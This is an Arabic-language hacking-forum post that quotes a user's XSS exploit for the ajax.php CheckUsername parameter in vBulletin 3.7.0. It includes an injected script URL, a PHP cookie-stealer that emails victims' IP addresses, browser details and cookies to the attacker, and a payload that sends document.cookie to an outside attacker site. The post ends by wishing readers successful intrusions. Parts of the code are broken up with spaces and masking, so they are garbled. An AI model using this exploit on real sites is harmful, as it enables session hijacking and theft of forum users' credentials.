:: vBspiders Professional Network :: - عرض مشاركة واحدة

PASSEWORD · 11-09-2008, 01:14 AM

اقتباس

المشاركة الأصلية كتبت بواسطة Da®k H@©K3R


	السلام عليكم بدون مقدمآت الثغرة في ملف ajax.php vBulletin 3.7.0 <= XSS Explot ثغرة التسجيل بواسطة الآجاكس هي عبارة عن ثغرة في التسجيل اثناء التحقق من المعلومات اثناء كتابتها بالكيبورد هناك مواثع تستخدم طريقة هذه في التسجيل وهذه ثغرة في النسخة 3.7.0 ajaxReg: ajaxReg - Ajax Registration, with instant field checking - vBulletin.org Forum الثغرة : كود PHP: `http://[website]/[forumpath]/ajax.php?do=CheckUsername&param=# EVIL XSS SCRIPT # http://www.site.com/forums/ajax.php?do=CheckUsername&param=*************('xss');</script>` آعمل ملف جديد كود PHP: File.php <? $ Ip = $ _SERVER [ ’REMOTE_ADDR’]; $ UserAgent = $ _SERVER [ ’HTTP_USER_AGENT’]; $Accept $ = $ _SERVER [ ’HTTP_ACCEPT_LANGUAGE’]; $Co okie = $ _GET [ ’c’]; $Myemail = "YOUR E-MAIL; $Date = today ( "l, j F, Y, g: ia"); $Subject = "Xss th30nR"; $Message = "Th30nuR () 2006 Ip: $ ip Coo kies: $ coo kies Browser: $ userAgent Language: $ accept URL: Basic $ Day & Time: $ today \\\\ n"; $ From = "From: $ myemail \\\\ r \\\\ n"; Mail ($ myemail, $ subject, $ message, $ from); ?> تطبيق: كود PHP: `www.vb.com/vb/ajax.php?do=CheckUsername&param=****** ****.location.replace ( ’http://WWW.ursite.com/FILE.php?c =’ + ******.co okie); </ script> مع انك تشيل الفراغات اللي في coo kie` وإختراقات موفقة وهذا برنامج للاخ Sn!pEr-Dz برنامج لاضهار ملفات اي الموقع مميز جدا وخطير جدا يطلعلك عديد ملفات الموقع مثل ajax.php والي ناوي يخترق منتدانا اقول هذي النسخة 3.8.1 يعني شوف نعجة العب معاها:d اخوكم dark hacker اهداء لPassword & inconnu

دائما مبدع كالعادة
شكرا على الاهداء